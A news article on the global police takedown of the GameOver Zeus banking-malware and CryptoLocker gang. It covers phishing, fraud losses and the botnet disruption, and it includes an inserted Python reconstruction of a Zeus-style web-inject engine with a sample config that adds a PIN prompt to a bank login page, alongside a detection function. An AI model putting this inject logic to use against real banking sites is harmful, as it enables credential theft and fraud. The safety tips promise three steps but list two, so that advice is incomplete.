Exclusive: behind the scenes as police across the world hit a notorious group of cyber criminals responsible for hacking into computers, stealing up to half a billion pounds and blackmailing victims.
It was one of the most sophisticated cyber crime campaigns ever mounted: a hacking spree that snared millions of victims worldwide and netted the gang behind it as much as half a billion pounds. Not content with raiding the bank accounts of their victims, the thieves blackmailed them, and then hijacked their computers to snare even more targets.
The criminal network behind it has now been hit by a global police operation. Channel 4 News was given exclusive access to the UK’s National Cyber Crime Unit (NCCU) as it helped in the take-down of the GameOver Zeus Crew, a notorious group of computer criminals believed to be based in Russia.
The gang used carefully crafted phishing emails to trick its way on to victims’ machines, often masquerading as urgent messages from HMRC or Companies House. Some corporate victims told Channel 4 News that the emails included specific details about their company to add to their authenticity.
The emails carried an attachment or link which, when the recipient clicked on it, installed GameOver Zeus, a powerful piece of banking malware. The first stage checked whether the computer’s keyboard layout was set to Russian and, if it was not, installed the full trojan, which gave the criminal gang complete control over the machine.
“Anything you can do on your computer, they can do on your computer without you knowing,” said Stewart Garrick, who has led the NCCU’s investigation into the gang. “I know of more than 15,000 computers in the UK infected with this right now.”
The malware was used to blackmail victims, steal cash from their bank accounts, and then turn the infected computer into a tool for snaring other victims.
It gave the criminals real-time access to the victim’s entire online life: Channel 4 News was shown how the hackers can record videos of everything that appears on the screen, gather passwords for websites, and even switch on the webcam.
Blackmail is a key tactic: the gang was behind a global extortion campaign that hit doctors’ surgeries, lawyers and even police stations. It used its foothold on infected machines to install CryptoLocker, ransomware which encrypts the victim’s files and sets a deadline to pay a ransom of hundreds of pounds for the key to get them back.
Eunice Power, a chef in Co Waterford, found the contents of her laptop scrambled. “This big red screen appeared saying ‘your files have been encrypted’. I checked the files and it was all gobbledygook, one after the other. I unplugged it thinking that would sort it out but it didn’t.
“At this point it was flashing up an amount of time, I had 72 hours to pay a ransom. I had an external back-up which was plugged in at the time so that was all encrypted. I could feel perspiration coming out through me. I didn’t believe anything could be so evil.”
The blackmailers demanded payment in the virtual currency Bitcoin. As Mrs Power struggled to make the payment work, the countdown hit zero.
“I lost everything: family photos, accounts, payroll, everything. If someone had robbed my house it would have been easier. It was devastating,” she said.
The encrypted files keep their names and folders, so she can still see which photos and documents she lost, but when she tries to open one she is confronted with nothing but scrambled data.
Blackmail is just one option: the thieves’ main target is internet banking.
“They want to monetise the investment they’ve made in getting into your machine,” said Don Smith of Dell SecureWorks, which has spent years tracking the gang. “They are absolutely after dollars, pounds and euros.”
Once installed, the malware waits for the computer to connect to an online banking site and then alerts the criminals, who can manipulate what the victim sees in the browser, inserting fake pages and fields and tricking them into authorising transfers out of their account.
With the criminals' network disrupted, now is the time to protect your computer. There are three things you need to do:
1. Update your operating system (this is Microsoft Windows if you own a PC, or Mac OS if you have an Apple machine).
2. Install, update and run anti-virus software. There are many options but try to buy it as a physical CD - that way you don't risk downloading from a dodgy website.
There is more advice on the government’s Get Safe Online website.
“They are able to inject pages between the user and their bank without anyone being any the wiser,” said Smith. “They can ask for extra login credentials, ask for credit card numbers, anything to get the victim to a point where money can be transferred out.”
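The mechanism behind the fake pages described above, both the manipulation of what the victim sees and Smith’s remark about injecting pages, is a browser-side “web inject”: the malware rewrites the bank’s HTML inside the browser, so the page the user sees is not the page the bank sent. The following is an added illustration written for this page, not code from the gang, the NCCU or Dell SecureWorks. It parses a configuration in the plain-text format the Zeus family uses for web injects (set_url / data_before / data_inject / data_after / data_end) and applies it to a bank login page. The bank site, the configuration and the login page are constructed samples, and the replace-between-anchors reading of the format is the usual one and is assumed here.

```python
"""Zeus-family web inject, reconstructed as an illustration (added example, constructed data)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from fnmatch import fnmatch


@dataclass
class Inject:
    url_pattern: str      # set_url glob the page URL must match
    flags: str            # e.g. "GP" = apply to GET and POST responses
    before: str = ""      # anchor text after which the inject is placed
    inject: str = ""      # HTML to insert
    after: str = ""       # anchor text before which the inject ends


def parse_webinjects(text: str) -> list[Inject]:
    """Parse the set_url / data_* block format into Inject records."""
    injects: list[Inject] = []
    current: Inject | None = None
    section: str | None = None
    buf: list[str] = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("set_url"):
            parts = stripped.split()
            current = Inject(url_pattern=parts[1], flags=parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif stripped in ("data_before", "data_inject", "data_after"):
            section = stripped[5:]          # "before" / "inject" / "after"
            buf = []
        elif stripped == "data_end":
            if current is not None and section is not None:
                setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)                # keep content lines verbatim
    return injects


def _anchor_regex(anchor: str) -> str:
    """'*' inside an anchor is a wildcard; everything else is literal."""
    return ".*?".join(re.escape(part) for part in anchor.split("*"))


def apply_injects(url: str, html: str, injects: list[Inject]) -> str:
    """Rewrite the served HTML the way the malware does inside the browser.

    Text between the before- and after-anchors is replaced by the inject; an
    empty data_after means nothing is removed and the inject is simply inserted.
    """
    for inj in injects:
        if not fnmatch(url, inj.url_pattern):
            continue
        pattern = re.compile(
            "(" + _anchor_regex(inj.before) + ").*?(" + _anchor_regex(inj.after) + ")",
            re.DOTALL,
        )
        html, _ = pattern.subn(lambda m: m.group(1) + inj.inject + m.group(2), html, count=1)
    return html


_INPUT_NAME = re.compile(r'<input[^>]*\bname="([^"]+)"', re.I)


def unexpected_fields(served_html: str, rendered_html: str) -> set[str]:
    """Form fields the browser renders that the bank never served.

    The bank's server cannot see the inject, so only a comparison like this one
    (client-side integrity script, or a posted-field check against the real form)
    reveals the extra credential prompt.
    """
    return set(_INPUT_NAME.findall(rendered_html)) - set(_INPUT_NAME.findall(served_html))


# Constructed sample config: add a "card PIN" prompt under the password box on the login page.
WEBINJECT_CONFIG = """
set_url https://bank.example/login* GP
data_before
<input type="password" name="password"*>
data_end
data_inject
<label>Card PIN</label><input type="password" name="pin">
data_end
data_after
data_end
"""

# Constructed sample of what the (hypothetical) bank actually serves.
LOGIN_PAGE = """<form action="/login" method="post">
<input type="text" name="user">
<input type="password" name="password">
<button>Log in</button>
</form>"""


if __name__ == "__main__":
    injects = parse_webinjects(WEBINJECT_CONFIG)
    shown = apply_injects("https://bank.example/login", LOGIN_PAGE, injects)
    print(shown)
    print("fields the bank never asked for:", unexpected_fields(LOGIN_PAGE, shown))
```

Run as a script it prints the rewritten login form with the extra PIN field and then the set of field names that exist only in the browser’s copy. The point for defenders is in that last line: the injected prompt is indistinguishable from the real page to the user and invisible to the bank, which is why the AEV employee below had no reason to doubt the request to use her keypad.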
One of the victims was AEV, a varnish manufacturer in Birkenhead. An employee’s computer was infected after she clicked on the link or attachment in one of the gang’s emails.
The thieves’ fake web pages convinced her that her bank login had failed and that she needed to use the security keypad that is normally used only to authorise transfers. By entering codes from the keypad she unwittingly authorised two payments to accounts in Ukraine and Cyprus.
“We lost £100,000 in under three minutes,” said AEV Managing Director Jonathan Kemp. “We started the day normally, and by the end of it there was utter horror.”
The business eventually got the money back from the bank, but in the meantime, after it went public, it was contacted by dozens of fellow victims.
“The phone started ringing. Eventually we ended up with 40 or 50 businesses that had been hit. I calculated the losses at something like £3.5m,” said Mr Kemp.
In fact, there are millions of victims around the world. Once infected, a victim’s computer joins the criminals’ peer-to-peer network: it relays instructions to other infected machines and sends phishing emails to snare more targets.
This weekend, the NCCU, working with technology companies, the FBI and other police forces around the world, moved to break up the network. They redirected the infected computers’ peer-to-peer traffic to servers under their own control so that the machines could no longer relay instructions to one another, and then, with the help of internet companies, took over the fallback network of command servers through which the gang could otherwise have regained control of the infected machines.
“This is the biggest operation I’ve been involved with in 28 years in law enforcement,” said Mr Garrick. “We’re taking unprecedented steps, and it’s truly global in scale.”
The NCCU’s hope is that if it can stop the GOZ Crew’s botnet from receiving updates, it will give software and anti-virus firms a chance to catch up. Users can then update their software, run anti-virus programmes and clean their machines before the gang can reach them again.
“It’s a window of opportunity,” said Mr Garrick. But with the criminals able to vanish into cyberspace at the press of a button, it seems inevitable they will return soon with newer, smarter tactics.